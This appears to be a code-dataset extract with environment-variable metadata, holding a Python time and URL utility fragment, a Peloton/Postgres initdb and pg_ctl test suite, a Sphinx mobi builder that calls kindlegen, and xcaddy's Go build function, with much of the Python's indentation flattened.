url_loc_step = fill_tags2string(url_loc_raw, tags_template, tags_values_step)
url_step = url_root_step + url_file_step + url_lev_step + url_vars_step + url_bbox_step + url_loc_step
url_list.append(url_step)
url_ws[type_step] = url_list
return url_ws
# -------------------------------------------------------------------------------------
# -------------------------------------------------------------------------------------
# Method to fill tags in an unfilled string (path or filename)
def fill_tags2string(string_raw, tags_format=None, tags_filling=None):
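    # Replace '{tag}' placeholders in string_raw using the format patterns defined in
    # tags_format (e.g. strftime patterns) and the values provided in tags_filling.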
apply_tags = False
if string_raw is not None:
for tag in list(tags_format.keys()):
if tag in string_raw:
apply_tags = True
break
if apply_tags:
tags_format_tmp = deepcopy(tags_format)
for tag_key, tag_value in tags_format.items():
tag_key_tmp = '{' + tag_key + '}'
if tag_value is not None:
if tag_key_tmp in string_raw:
string_filled = string_raw.replace(tag_key_tmp, tag_value)
string_raw = string_filled
else:
tags_format_tmp.pop(tag_key, None)
for tag_format_name, tag_format_value in list(tags_format_tmp.items()):
if tag_format_name in list(tags_filling.keys()):
tag_filling_value = tags_filling[tag_format_name]
if tag_filling_value is not None:
if isinstance(tag_filling_value, datetime):
tag_filling_value = tag_filling_value.strftime(tag_format_value)
if isinstance(tag_filling_value, (float, int)):
tag_filling_value = tag_format_value.format(tag_filling_value)
string_filled = string_filled.replace(tag_format_value, tag_filling_value)
string_filled = string_filled.replace('//', '/')
return string_filled
else:
return string_raw
# -------------------------------------------------------------------------------------
# -------------------------------------------------------------------------------------
# Method to define data time range
def set_data_time(time_step, time_settings):
time_period_obs = time_settings['time_observed_period']
time_period_for = time_settings['time_forecast_period']
time_freq_obs = time_settings['time_observed_frequency']
time_freq_for = time_settings['time_forecast_frequency']
time_step_obs = time_step
time_range_obs = pd.date_range(end=time_step_obs, periods=time_period_obs, freq=time_freq_obs)
time_step_for = pd.date_range([time_step][0], periods=2, freq=time_freq_for)[-1]
time_range_for = pd.date_range(start=time_step_for, periods=time_period_for, freq=time_freq_for)
time_range_data = time_range_obs.union(time_range_for)
return time_range_data
# -------------------------------------------------------------------------------------
# -------------------------------------------------------------------------------------
# Method to check time validity
def check_time_limit(time_alg, time_name='time_step', time_limit_period='9D', time_round='D'):
time_day = pd.Timestamp.today()
time_limit_upper = time_day.floor(time_round)
time_limit_lower = pd.date_range(end=time_limit_upper, periods=2, freq=time_limit_period)[0]
if time_alg < time_limit_lower:
        logging.error(' ===> ' + time_name + ' is not available on source database! It is earlier than the DB time_from')
raise IOError(time_name + ' is not correctly defined! Check your settings or algorithm args!')
elif time_alg > time_limit_upper:
        logging.error(' ===> ' + time_name + ' is not available on source database! It is later than the DB time_to')
raise IOError(time_name + ' is not correctly defined! Check your settings or algorithm args!')
else:
pass
# -------------------------------------------------------------------------------------
# -------------------------------------------------------------------------------------
# Method to define run time range
def set_run_time(time_alg, time_settings):
time_set = time_settings['time_now']
time_freq = time_settings['time_frequency']
time_round = time_settings['time_rounding']
time_period = time_settings['time_period']
if time_period < 1:
time_period = 1
        logging.warning(' ===> TimePeriod must be greater than zero! TimePeriod set to 1.')
if time_alg and time_set:
time_now = time_alg
elif time_alg is None and time_set:
time_now = time_set
elif time_alg and time_set is None:
time_now = time_alg
else:
logging.error(' ===> TimeNow is not correctly set!')
raise IOError('TimeNow is undefined! Check your settings or algorithm args!')
time_now_raw = pd.Timestamp(time_now)
time_now_round = time_now_raw.floor(time_round)
if time_period > 0:
time_range = pd.date_range(end=time_now_round, periods=time_period, freq=time_freq)
else:
        logging.warning(' ===> TimePeriod must be greater than 0. TimePeriod is set automatically to 1')
time_range = pd.DatetimeIndex([time_now_round], freq=time_freq)
check_time_limit(time_now_round, time_name='time_now', time_round=time_round)
check_time_limit(time_range[0], time_name='time_run_from', time_round='H')
if time_period > 1:
check_time_limit(time_range[1], time_name='time_run_to', time_round='H')
else:
check_time_limit(time_range[0], time_name='time_run_to', time_round='H')
return time_now_round, time_range
# -------------------------------------------------------------------------------------
# -------------------------------------------------------------------------------------
# Method to make folder
def make_folder(path_folder):
if not exists(path_folder):
makedirs(path_folder)
# -------------------------------------------------------------------------------------
# -------------------------------------------------------------------------------------
# Method to read file json
def read_file_json(file_name):
env_ws = {}
for env_item, env_value in os.environ.items():
env_ws[env_item] = env_value
with open(file_name, "r") as file_handle:
json_block = []
for file_row in file_handle:
for env_key, env_value in env_ws.items():
env_tag = '$' + env_key
if env_tag in file_row:
env_value = env_value.strip("'\\'")
file_row = file_row.replace(env_tag, env_value)
file_row = file_row.replace('//', '/')
# Add the line to our JSON block
json_block.append(file_row)
# Check whether we closed our JSON block
if file_row.startswith('}'):
# Do something with the JSON dictionary
json_dict = json.loads(''.join(json_block))
# Start a new block
json_block = []
return json_dict
# -------------------------------------------------------------------------------------
# -------------------------------------------------------------------------------------
# Method to get script argument(s)
def get_args():
parser_handle = ArgumentParser()
parser_handle.add_argument('-settings_file', action="store", dest="alg_settings")
parser_handle.add_argument('-time', action="store", dest="alg_time")
parser_values = parser_handle.parse_args()
if parser_values.alg_settings:
alg_settings = parser_values.alg_settings
else:
alg_settings = 'configuration.json'
if parser_values.alg_time:
alg_time = parser_values.alg_time
else:
alg_time = None
return alg_settings, alg_time
# -------------------------------------------------------------------------------------
# -------------------------------------------------------------------------------------
# Method to set logging information
def set_logging(logger_file='log.txt', logger_format=None):
if logger_format is None:
logger_format = '%(asctime)s %(name)-12s %(levelname)-8s ' \
'%(filename)s:[%(lineno)-6s - %(funcName)20s()] %(message)s'
# Remove old logging file
if os.path.exists(logger_file):
os.remove(logger_file)
# Set level of root debugger
logging.root.setLevel(logging.DEBUG)
# Open logging basic configuration
logging.basicConfig(level=logging.DEBUG, format=logger_format, filename=logger_file, filemode='w')
# Set logger handle
logger_handle_1 = logging.FileHandler(logger_file, 'w')
logger_handle_2 = logging.StreamHandler()
# Set logger level
logger_handle_1.setLevel(logging.DEBUG)
logger_handle_2.setLevel(logging.DEBUG)
# Set logger formatter
logger_formatter = logging.Formatter(logger_format)
logger_handle_1.setFormatter(logger_formatter)
logger_handle_2.setFormatter(logger_formatter)
# Add handle to logging
logging.getLogger('').addHandler(logger_handle_1)
logging.getLogger('').addHandler(logger_handle_2)
# -------------------------------------------------------------------------------------
# ----------------------------------------------------------------------------
# Call script from external library
if __name__ == "__main__":
main()
# ----------------------------------------------------------------------------
|
[] |
[] |
[
"LD_LIBRARY_PATH",
"PATH"
] |
[]
|
["LD_LIBRARY_PATH", "PATH"]
|
python
| 2 | 0 | |
test/postgres/suite.py
|
#!/usr/bin/env python
# encoding: utf-8
## ==============================================
## GOAL : Test initdb, pg_ctl start and stop
## ==============================================
from __future__ import (absolute_import, division,
print_function, unicode_literals)
import sys
import shlex
import shutil
import tempfile
import os
import time
import logging
import platform
import unittest
import xmlrunner
from functools import reduce
from subprocess import Popen, PIPE
## ==============================================
## LOGGING CONFIGURATION
## ==============================================
LOG = logging.getLogger(__name__)
LOG_handler = logging.StreamHandler()
LOG_formatter = logging.Formatter(
fmt='%(asctime)s [%(funcName)s:%(lineno)03d] %(levelname)-5s: %(message)s',
datefmt='%m-%d-%Y %H:%M:%S'
)
LOG_handler.setFormatter(LOG_formatter)
LOG.addHandler(LOG_handler)
LOG.setLevel(logging.INFO)
## ==============================================
## CONFIGURATION
## ==============================================
BASE_DIR = os.path.abspath(os.path.dirname(__file__))
ROOT_DIR = reduce(os.path.join, [BASE_DIR, os.path.pardir, os.path.pardir])
BUILD_DIR = reduce(os.path.join, [ROOT_DIR, "build"])
# on Jenkins, we do not build in 'build' dir
if platform.node() == 'jenkins':
TOOLS_DIR = reduce(os.path.join, [ROOT_DIR, "tools"])
SRC_DIR = reduce(os.path.join, [ROOT_DIR, "src"])
else:
TOOLS_DIR = reduce(os.path.join, [BUILD_DIR, "tools"])
SRC_DIR = reduce(os.path.join, [BUILD_DIR, "src"])
LIB_DIR = reduce(os.path.join, [SRC_DIR, ".libs"])
my_env = os.environ.copy()
# Set the library path
if 'LD_LIBRARY_PATH' in my_env:
my_env['LD_LIBRARY_PATH'] += os.pathsep + LIB_DIR
else:
my_env['LD_LIBRARY_PATH'] = LIB_DIR
print(my_env['LD_LIBRARY_PATH'])
initdb = os.path.join(TOOLS_DIR, "initdb")
pg_ctl = os.path.join(TOOLS_DIR, "pg_ctl")
## ==============================================
## Test cases
## ==============================================
class BasicTest(unittest.TestCase):
def setUp(self):
LOG.info("Kill previous Peloton")
cmd = 'pkill -9 "peloton"'
self.exec_cmd(cmd, False)
LOG.info("Creating symbolic link for peloton")
cmd = 'ln -s ' + LIB_DIR + "/peloton " + TOOLS_DIR + "/.libs/"
self.exec_cmd(cmd, False)
LOG.info("Setting up temp data dir")
self.temp_dir_path = tempfile.mkdtemp()
LOG.info("Temp data dir : %s" % (self.temp_dir_path))
def test_basic(self):
LOG.info("Bootstrap data dir using initdb")
cmd = initdb + ' ' + self.temp_dir_path
self.exec_cmd(cmd)
LOG.info("Starting the Peloton server")
cmd = pg_ctl + ' -D ' + self.temp_dir_path + ' -l '+ self.temp_dir_path + '/basic_test_logfile start'
self.exec_cmd(cmd)
LOG.info("Waiting for the server to start")
time.sleep(5)
LOG.info("Stopping the Peloton server")
cmd = pg_ctl + ' -D ' + self.temp_dir_path + ' -l '+ self.temp_dir_path+'/basic_test_logfile stop'
self.exec_cmd(cmd)
LOG.info("Starting the Peloton server in TEST MODE")
cmd = pg_ctl + ' -D ' + self.temp_dir_path + ' -l '+ self.temp_dir_path+'/bridge_test_logfile -o -Z start'
self.exec_cmd(cmd)
LOG.info("Waiting for the server to start")
time.sleep(5)
LOG.info("Stopping the Peloton server")
cmd = pg_ctl + ' -D ' + self.temp_dir_path + ' -l '+ self.temp_dir_path+'/bridge_test_logfile stop'
self.exec_cmd(cmd)
def exec_cmd(self, cmd, check=True):
"""
Execute the external command and get its exitcode, stdout and stderr.
"""
args = shlex.split(cmd)
proc = Popen(args, stdout=PIPE, stderr=PIPE, env=my_env)
out, err = proc.communicate()
exitcode = proc.returncode
print(out)
print(err)
sys.stdout.flush()
if check:
self.assertTrue(exitcode == 0)
def tearDown(self):
LOG.info("Cleaning up the data dir")
shutil.rmtree(self.temp_dir_path)
os.remove(TOOLS_DIR + "/.libs/peloton")
## ==============================================
## MAIN
## ==============================================
if __name__ == '__main__':
unittest.main(
testRunner=xmlrunner.XMLTestRunner(output='python_tests', outsuffix=""),
failfast=False, buffer=False, catchbreak=False
)
|
[] |
[] |
[] |
[]
|
[]
|
python
| 0 | 0 | |
code/doc_builders/mobi.py
|
# -*- coding: utf-8 -*-
"""
sphinx.builders.mobi
~~~~~~~~~~~~~~~~~~~~
Build mobi files.
Originally derived from epub.py.
:copyright: Copyright 2007-2011 by the Sphinx team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import os
import re
import shutil
import sys
import time
import codecs
import zipfile
import subprocess
from os import path
from docutils import nodes
import sphinx
from sphinx.builders.html import StandaloneHTMLBuilder
from sphinx.util.osutil import EEXIST, make_filename
from sphinx.util.smartypants import sphinx_smarty_pants as ssp
# (Fragment) templates from which the metainfo files content.opf, toc.ncx,
# mimetype, and META-INF/container.xml are created.
# This template section also defines strings that are embedded in the html
# output but that may be customized by (re-)setting module attributes,
# e.g. from conf.py.
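# Illustrative note (not part of the original module): because the templates and
# helper strings below are plain module attributes, a project's conf.py could
# override them after importing this module, e.g.
#
#   import mobi  # the import path is an assumption; it depends on how the builder is installed
#   mobi._css_link_target_class = u'my-link-target'
#   mobi._link_target_template = u' <%(uri)s>'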
_mimetype_template = 'application/x-mobipocket-ebook' # no EOL!
_container_template = u'''\
<?xml version="1.0" encoding="UTF-8"?>
<container version="1.0"
xmlns="urn:oasis:names:tc:opendocument:xmlns:container">
<rootfiles>
<rootfile full-path="content.opf"
media-type="application/oebps-package+xml"/>
</rootfiles>
</container>
'''
_toc_template = u'''\
<?xml version="1.0"?>
<ncx version="2005-1" xmlns="http://www.daisy.org/z3986/2005/ncx/">
<head>
<meta name="dtb:uid" content="%(uid)s"/>
<meta name="dtb:depth" content="%(level)d"/>
<meta name="dtb:totalPageCount" content="0"/>
<meta name="dtb:maxPageNumber" content="0"/>
</head>
<docTitle>
<text>%(title)s</text>
</docTitle>
<navMap>
%(navpoints)s
</navMap>
</ncx>
'''
_navpoint_template = u'''\
%(indent)s <navPoint id="%(navpoint)s" playOrder="%(playorder)d">
%(indent)s <navLabel>
%(indent)s <text>%(text)s</text>
%(indent)s </navLabel>
%(indent)s <content src="%(refuri)s" />
%(indent)s </navPoint>'''
_navpoint_indent = ' '
_navPoint_template = 'navPoint%d'
_content_template = u'''\
<?xml version="1.0" encoding="UTF-8"?>
<package xmlns="http://www.idpf.org/2007/opf" version="2.0"
unique-identifier="%(uid)s">
<metadata xmlns:opf="http://www.idpf.org/2007/opf"
xmlns:dc="http://purl.org/dc/elements/1.1/">
<dc:language>%(lang)s</dc:language>
<dc:title>%(title)s</dc:title>
<dc:creator opf:role="aut">%(author)s</dc:creator>
<dc:publisher>%(publisher)s</dc:publisher>
<dc:rights>%(copyright)s</dc:rights>
<dc:identifier id="%(uid)s" opf:scheme="%(scheme)s">%(id)s</dc:identifier>
<dc:date>%(date)s</dc:date>
</metadata>
<manifest>
<item id="ncx" href="toc.ncx" media-type="application/x-dtbncx+xml" />
%(files)s
</manifest>
<spine toc="ncx">
%(spine)s
</spine>
<guide>
<reference Type="toc" title="Table of Contents" href="index.html" />
</guide>
</package>
'''
_cover_template = u'''\
<meta name="cover" content="%s"/>
'''
_file_template = u'''\
<item id="%(id)s"
href="%(href)s"
media-type="%(media_type)s" />'''
_spine_template = u'''\
<itemref idref="%(idref)s" />'''
_toctree_template = u'toctree-l%d'
_link_target_template = u' [%(uri)s]'
_css_link_target_class = u'link-target'
_media_types = {
'.html': 'application/xhtml+xml',
'.css': 'text/css',
'.png': 'image/png',
'.gif': 'image/gif',
'.svg': 'image/svg+xml',
'.jpg': 'image/jpeg',
'.jpeg': 'image/jpeg',
'.otf': 'application/x-font-otf',
'.ttf': 'application/x-font-ttf',
}
# Regular expression to match colons only in local fragment identifiers.
# If the URI contains a colon before the #,
# it is an external link that should not change.
_refuri_re = re.compile("([^#:]*#)(.*)")
def which(program):
import os
def is_exe(fpath):
return os.path.isfile(fpath) and os.access(fpath, os.X_OK)
fpath, fname = os.path.split(program)
if fpath:
if is_exe(program):
return program
else:
for current_path in os.environ["PATH"].split(os.pathsep):
current_path = current_path.strip('"')
exe_file = os.path.join(current_path, program)
if is_exe(exe_file):
return exe_file
return None
def clean_html_file_for_kindle(filename):
def replace_tag(tag_old, tag_new, txt):
txt = txt.replace("<" + tag_old, "<" + tag_new)
return txt.replace("</{0}>".format(tag_old), "</{0}>".format(tag_new))
bakname = filename + ".bak"
shutil.move(filename, bakname)
destination = open(filename, 'w')
original = open(bakname, 'r')
for txt in original:
txt = replace_tag("span", "samp", txt)
#txt = replace_tag("pre", "code", txt)
destination.write(txt)
destination.close()
original.close()
os.remove(bakname)
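# Illustrative sketch (not in the original source): clean_html_file_for_kindle
# rewrites a file in place, so markup such as the hypothetical
#   <span class="pre">make html</span>
# becomes
#   <samp class="pre">make html</samp>
# which Kindle renders in a monospace face; only the span -> samp substitution
# is taken from the function body above.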
# The mobi publisher
class MobiBuilder(StandaloneHTMLBuilder):
"""
Builder that outputs mobi files.
    It creates the metainfo files content.opf, toc.ncx, mimetype, and
META-INF/container.xml. Afterwards, all necessary files are zipped to an
mobi file.
"""
name = 'mobi'
# don't copy the reST source
copysource = False
supported_image_types = ['image/svg+xml', 'image/png', 'image/gif',
'image/jpeg']
# don't add links
add_permalinks = False
# don't add sidebar etc.
embedded = True
# disable download role
download_support = False
    # don't create links to original images from scaled images
html_scaled_image_link = False
# don't generate search index or include search page
search = False
def init(self):
StandaloneHTMLBuilder.init(self)
# the output files for mobi must be .html only
self.out_suffix = '.html'
self.playorder = 0
def get_theme_config(self):
return self.config.mobi_theme, {}
# generic support functions
def make_id(self, name):
"""Replace all characters not allowed for (X)HTML ids."""
return name.replace('/', '_').replace(' ', '')
def esc(self, name):
"""Replace all characters not allowed in text an attribute values."""
# Like cgi.escape, but also replace apostrophe
        name = name.replace('&', '&amp;')
        name = name.replace('<', '&lt;')
        name = name.replace('>', '&gt;')
        name = name.replace('"', '&quot;')
        name = name.replace('\'', '&#39;')
return name
def get_refnodes(self, doctree, result):
"""Collect section titles, their depth in the toc and the refuri."""
# XXX: is there a better way than checking the attribute
# toctree-l[1-8] on the parent node?
if isinstance(doctree, nodes.reference) and doctree.has_key('refuri'):
refuri = doctree['refuri']
if refuri.startswith('http://') or refuri.startswith('https://') \
or refuri.startswith('irc:') or refuri.startswith('mailto:'):
return result
classes = doctree.parent.attributes['classes']
for level in range(8, 0, -1): # or range(1, 8)?
if (_toctree_template % level) in classes:
result.append({
'level': level,
'refuri': self.esc(refuri),
'text': ssp(self.esc(doctree.astext()))
})
break
else:
for elem in doctree.children:
result = self.get_refnodes(elem, result)
return result
def get_toc(self):
"""Get the total table of contents, containg the master_doc
and pre and post files not managed by sphinx.
"""
doctree = self.env.get_and_resolve_doctree(self.config.master_doc,
self, prune_toctrees=False)
self.refnodes = self.get_refnodes(doctree, [])
master_dir = os.path.dirname(self.config.master_doc)
if master_dir:
master_dir += '/' # XXX or os.sep?
for item in self.refnodes:
item['refuri'] = master_dir + item['refuri']
self.refnodes.insert(0, {
'level': 1,
'refuri': self.esc(self.config.master_doc + '.html'),
'text': ssp(self.esc(
self.env.titles[self.config.master_doc].astext()))
})
for file, text in reversed(self.config.mobi_pre_files):
self.refnodes.insert(0, {
'level': 1,
'refuri': self.esc(file),
'text': ssp(self.esc(text))
})
for file, text in self.config.mobi_post_files:
self.refnodes.append({
'level': 1,
'refuri': self.esc(file),
'text': ssp(self.esc(text))
})
def fix_fragment(self, prefix, fragment):
"""Return a href/id attribute with colons replaced by hyphens."""
return prefix + fragment.replace(':', '-')
def fix_ids(self, tree):
"""Replace colons with hyphens in href and id attributes.
Some readers crash because they interpret the part as a
transport protocol specification.
"""
for node in tree.traverse(nodes.reference):
if 'refuri' in node:
m = _refuri_re.match(node['refuri'])
if m:
node['refuri'] = self.fix_fragment(m.group(1), m.group(2))
if 'refid' in node:
node['refid'] = self.fix_fragment('', node['refid'])
for node in tree.traverse(sphinx.addnodes.desc_signature):
ids = node.attributes['ids']
newids = []
for id in ids:
newids.append(self.fix_fragment('', id))
node.attributes['ids'] = newids
def add_visible_links(self, tree):
"""Append visible link targets after external links."""
for node in tree.traverse(nodes.reference):
uri = node.get('refuri', '')
if (uri.startswith('http:') or uri.startswith('https:') or
uri.startswith('ftp:')) and uri not in node.astext():
uri = _link_target_template % {'uri': uri}
if uri:
idx = node.parent.index(node) + 1
link = nodes.inline(uri, uri)
link['classes'].append(_css_link_target_class)
node.parent.insert(idx, link)
def write_doc(self, docname, doctree):
"""Write one document file.
This method is overwritten in order to fix fragment identifiers
and to add visible external links.
"""
self.fix_ids(doctree)
if self.config.mobi_add_visible_links:
self.add_visible_links(doctree)
return StandaloneHTMLBuilder.write_doc(self, docname, doctree)
def fix_genindex(self, tree):
"""Fix href attributes for genindex pages."""
# XXX: modifies tree inline
# Logic modeled from themes/basic/genindex.html
for key, columns in tree:
for entryname, (links, subitems) in columns:
for (i, (ismain, link)) in enumerate(links):
m = _refuri_re.match(link)
if m:
links[i] = (ismain,
self.fix_fragment(m.group(1), m.group(2)))
for subentryname, subentrylinks in subitems:
for (i, (ismain, link)) in enumerate(subentrylinks):
m = _refuri_re.match(link)
if m:
subentrylinks[i] = (ismain,
self.fix_fragment(m.group(1), m.group(2)))
def handle_page(self, pagename, addctx, templatename='page.html',
outfilename=None, event_arg=None):
"""Create a rendered page.
This method is overwritten for genindex pages in order to fix href link
attributes.
"""
if pagename.startswith('genindex'):
self.fix_genindex(addctx['genindexentries'])
StandaloneHTMLBuilder.handle_page(self, pagename, addctx, templatename,
outfilename, event_arg)
# Finish by building the mobi file
def handle_finish(self):
"""Create the metainfo files and finally the mobi."""
self.get_toc()
self.build_mimetype(self.outdir, 'mimetype')
self.build_container(self.outdir, 'META-INF/container.xml')
self.build_content(self.outdir, 'content.opf')
self.build_toc(self.outdir, 'toc.ncx')
# we build an epub for now
self.cleanup_files()
mobi_name = self.config.mobi_basename + '.mobi'
fullname = os.path.join(self.outdir, "content.opf")
kindle_exists = which('kindlegen')
if not kindle_exists:
            raise Exception('kindlegen executable not found in PATH. Is it installed?')
subprocess.call(["kindlegen", "-c1", fullname, "-o", mobi_name])
def build_mimetype(self, outdir, outname):
"""Write the metainfo file mimetype."""
self.info('writing %s file...' % outname)
f = codecs.open(path.join(outdir, outname), 'w', 'utf-8')
try:
f.write(_mimetype_template)
finally:
f.close()
def build_container(self, outdir, outname):
"""Write the metainfo file META-INF/cointainer.xml."""
self.info('writing %s file...' % outname)
fn = path.join(outdir, outname)
try:
os.mkdir(path.dirname(fn))
except OSError as err:
if err.errno != EEXIST:
raise
f = codecs.open(path.join(outdir, outname), 'w', 'utf-8')
try:
f.write(_container_template)
finally:
f.close()
def content_metadata(self, files, spine):
"""Create a dictionary with all metadata for the content.opf
file properly escaped.
"""
metadata = {}
metadata['title'] = self.esc(self.config.mobi_title)
metadata['author'] = self.esc(self.config.mobi_author)
metadata['uid'] = self.esc(self.config.mobi_uid)
metadata['lang'] = self.esc(self.config.mobi_language)
metadata['publisher'] = self.esc(self.config.mobi_publisher)
metadata['copyright'] = self.esc(self.config.mobi_copyright)
metadata['scheme'] = self.esc(self.config.mobi_scheme)
metadata['id'] = self.esc(self.config.mobi_identifier)
metadata['date'] = self.esc(time.strftime('%Y-%m-%d'))
metadata['files'] = files
metadata['spine'] = spine
return metadata
def build_content(self, outdir, outname):
"""Write the metainfo file content.opf It contains bibliographic data,
a file list and the spine (the reading order).
"""
self.info('writing %s file...' % outname)
# files
if not outdir.endswith(os.sep):
outdir += os.sep
olen = len(outdir)
projectfiles = []
self.files = []
self.ignored_files = ['.buildinfo',
'mimetype', 'content.opf', 'toc.ncx', 'META-INF/container.xml',
self.config.mobi_basename + '.mobi'] + \
self.config.mobi_exclude_files
for root, dirs, files in os.walk(outdir):
for fn in files:
filename = path.join(root, fn)[olen:]
if filename in self.ignored_files:
continue
ext = path.splitext(filename)[-1]
if ext not in _media_types:
self.warn('unknown mimetype for %s, ignoring' % filename,
type='mobi', subtype='unknown_project_files')
continue
projectfiles.append(_file_template % {
'href': self.esc(filename),
'id': self.esc(self.make_id(filename)),
'media_type': self.esc(_media_types[ext])
})
self.files.append(filename)
# spine
spine = []
for item in self.refnodes:
if '#' in item['refuri']:
continue
if item['refuri'] in self.ignored_files:
continue
spine.append(_spine_template % {
'idref': self.esc(self.make_id(item['refuri']))
})
for info in self.domain_indices:
spine.append(_spine_template % {
'idref': self.esc(self.make_id(info[0] + self.out_suffix))
})
if self.config.html_use_index:
spine.append(_spine_template % {
'idref': self.esc(self.make_id('genindex' + self.out_suffix))
})
# add the optional cover
content_tmpl = _content_template
if self.config.mobi_cover:
image = self.config.mobi_cover
mpos = content_tmpl.rfind('</metadata>')
cpos = content_tmpl.rfind('\n', 0 , mpos) + 1
content_tmpl = content_tmpl[:cpos] + \
(_cover_template % image) + \
content_tmpl[cpos:]
projectfiles = '\n'.join(projectfiles)
spine = '\n'.join(spine)
# write the project file
f = codecs.open(path.join(outdir, outname), 'w', 'utf-8')
try:
f.write(content_tmpl % \
self.content_metadata(projectfiles, spine))
finally:
f.close()
def new_navpoint(self, node, level, incr=True):
"""Create a new entry in the toc from the node at given level."""
# XXX Modifies the node
if incr:
self.playorder += 1
node['indent'] = _navpoint_indent * level
node['navpoint'] = self.esc(_navPoint_template % self.playorder)
node['playorder'] = self.playorder
return _navpoint_template % node
def insert_subnav(self, node, subnav):
"""Insert nested navpoints for given node.
The node and subnav are already rendered to text.
"""
nlist = node.rsplit('\n', 1)
nlist.insert(-1, subnav)
return '\n'.join(nlist)
def build_navpoints(self, nodes):
"""Create the toc navigation structure.
Subelements of a node are nested inside the navpoint. For nested nodes
the parent node is reinserted in the subnav.
"""
navstack = []
navlist = []
level = 1
lastnode = None
for node in nodes:
if not node['text']:
continue
file = node['refuri'].split('#')[0]
if file in self.ignored_files:
continue
if node['level'] > self.config.mobi_tocdepth:
continue
if node['level'] == level:
navlist.append(self.new_navpoint(node, level))
elif node['level'] == level + 1:
navstack.append(navlist)
navlist = []
level += 1
if lastnode and self.config.mobi_tocdup:
# Insert starting point in subtoc with same playOrder
navlist.append(self.new_navpoint(lastnode, level, False))
navlist.append(self.new_navpoint(node, level))
else:
while node['level'] < level:
subnav = '\n'.join(navlist)
navlist = navstack.pop()
navlist[-1] = self.insert_subnav(navlist[-1], subnav)
level -= 1
navlist.append(self.new_navpoint(node, level))
lastnode = node
while level != 1:
subnav = '\n'.join(navlist)
navlist = navstack.pop()
navlist[-1] = self.insert_subnav(navlist[-1], subnav)
level -= 1
return '\n'.join(navlist)
def toc_metadata(self, level, navpoints):
"""Create a dictionary with all metadata for the toc.ncx file
properly escaped.
"""
metadata = {}
metadata['uid'] = self.config.mobi_uid
metadata['title'] = self.config.mobi_title
metadata['level'] = level
metadata['navpoints'] = navpoints
return metadata
def build_toc(self, outdir, outname):
"""Write the metainfo file toc.ncx."""
self.info('writing %s file...' % outname)
navpoints = self.build_navpoints(self.refnodes)
level = max(item['level'] for item in self.refnodes)
level = min(level, self.config.mobi_tocdepth)
f = codecs.open(path.join(outdir, outname), 'w', 'utf-8')
try:
f.write(_toc_template % self.toc_metadata(level, navpoints))
finally:
f.close()
def cleanup_files(self):
"""Write the mobi file using kindlegen."""
self.info('cleaning html files...')
for item in self.files:
if item.endswith("html"):
clean_html_file_for_kindle(os.path.join(self.outdir, item))
def setup(app):
app.add_config_value('mobi_basename',lambda self: make_filename(self.project), None)
app.add_config_value('mobi_theme','mobi', 'html')
app.add_config_value('mobi_title',lambda self: self.html_title, 'html')
app.add_config_value('mobi_author','unknown', 'html')
app.add_config_value('mobi_language',lambda self: self.language or 'en', 'html')
app.add_config_value('mobi_publisher','unknown', 'html')
app.add_config_value('mobi_copyright',lambda self: self.copyright, 'html')
app.add_config_value('mobi_identifier','unknown', 'html')
app.add_config_value('mobi_scheme','unknown', 'html')
app.add_config_value('mobi_uid','unknown', 'env')
app.add_config_value('mobi_cover',(), 'env')
app.add_config_value('mobi_pre_files',[], 'env')
app.add_config_value('mobi_post_files',[], 'env')
app.add_config_value('mobi_exclude_files',[], 'env')
app.add_config_value('mobi_tocdepth',3, 'env')
app.add_config_value('mobi_tocdup',True, 'env')
app.add_config_value('mobi_add_visible_links',True, 'env')
app.add_builder(MobiBuilder)
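# Illustrative conf.py sketch (an assumption, not shipped with this builder; the
# extension name, metadata values and cover file are placeholders):
#
#   extensions = ['mobi']        # however this module is exposed to Sphinx
#   mobi_basename = 'MyBook'
#   mobi_title = u'My Book'
#   mobi_author = u'Jane Doe'
#   mobi_cover = 'cover.jpg'
#
# The option names mirror the add_config_value() calls registered above.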
|
[] |
[] |
[
"PATH"
] |
[]
|
["PATH"]
|
python
| 1 | 0 | |
builder.go
|
// Copyright 2020 Matthew Holt
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package xcaddy
import (
"context"
"fmt"
"io/ioutil"
"log"
"os"
"path"
"path/filepath"
"regexp"
"runtime"
"strconv"
"strings"
"time"
"github.com/Masterminds/semver/v3"
)
// Builder can produce a custom Caddy build with the
// configuration it represents.
type Builder struct {
Compile
CaddyVersion string `json:"caddy_version,omitempty"`
Plugins []Dependency `json:"plugins,omitempty"`
Replacements []Replace `json:"replacements,omitempty"`
TimeoutGet time.Duration `json:"timeout_get,omitempty"`
TimeoutBuild time.Duration `json:"timeout_build,omitempty"`
RaceDetector bool `json:"race_detector,omitempty"`
SkipCleanup bool `json:"skip_cleanup,omitempty"`
}
// Build builds Caddy at the configured version with the
// configured plugins and plops down a binary at outputFile.
func (b Builder) Build(ctx context.Context, outputFile string) error {
if outputFile == "" {
return fmt.Errorf("output file path is required")
}
// the user's specified output file might be relative, and
// because the `go build` command is executed in a different,
// temporary folder, we convert the user's input to an
	// absolute path so it goes to the expected place
absOutputFile, err := filepath.Abs(outputFile)
if err != nil {
return err
}
// set some defaults from the environment, if applicable
if b.OS == "" {
b.OS = os.Getenv("GOOS")
}
if b.Arch == "" {
b.Arch = os.Getenv("GOARCH")
}
if b.ARM == "" {
b.ARM = os.Getenv("GOARM")
}
// prepare the build environment
buildEnv, err := b.newEnvironment(ctx)
if err != nil {
return err
}
defer buildEnv.Close()
// prepare the environment for the go command; for
// the most part we want it to inherit our current
// environment, with a few customizations
env := os.Environ()
env = setEnv(env, "GOOS="+b.OS)
env = setEnv(env, "GOARCH="+b.Arch)
env = setEnv(env, "GOARM="+b.ARM)
if b.RaceDetector && !b.Compile.Cgo {
log.Println("[WARNING] Enabling cgo because it is required by the race detector")
b.Compile.Cgo = true
}
env = setEnv(env, fmt.Sprintf("CGO_ENABLED=%s", b.Compile.CgoEnabled()))
log.Println("[INFO] Building Caddy")
// compile
cmd := buildEnv.newCommand("go", "build",
"-o", absOutputFile,
"-ldflags", "-w -s", // trim debug symbols
"-trimpath",
)
if b.RaceDetector {
cmd.Args = append(cmd.Args, "-race")
}
cmd.Env = env
err = buildEnv.runCommand(ctx, cmd, b.TimeoutBuild)
if err != nil {
return err
}
log.Printf("[INFO] Build complete: %s", outputFile)
return nil
}
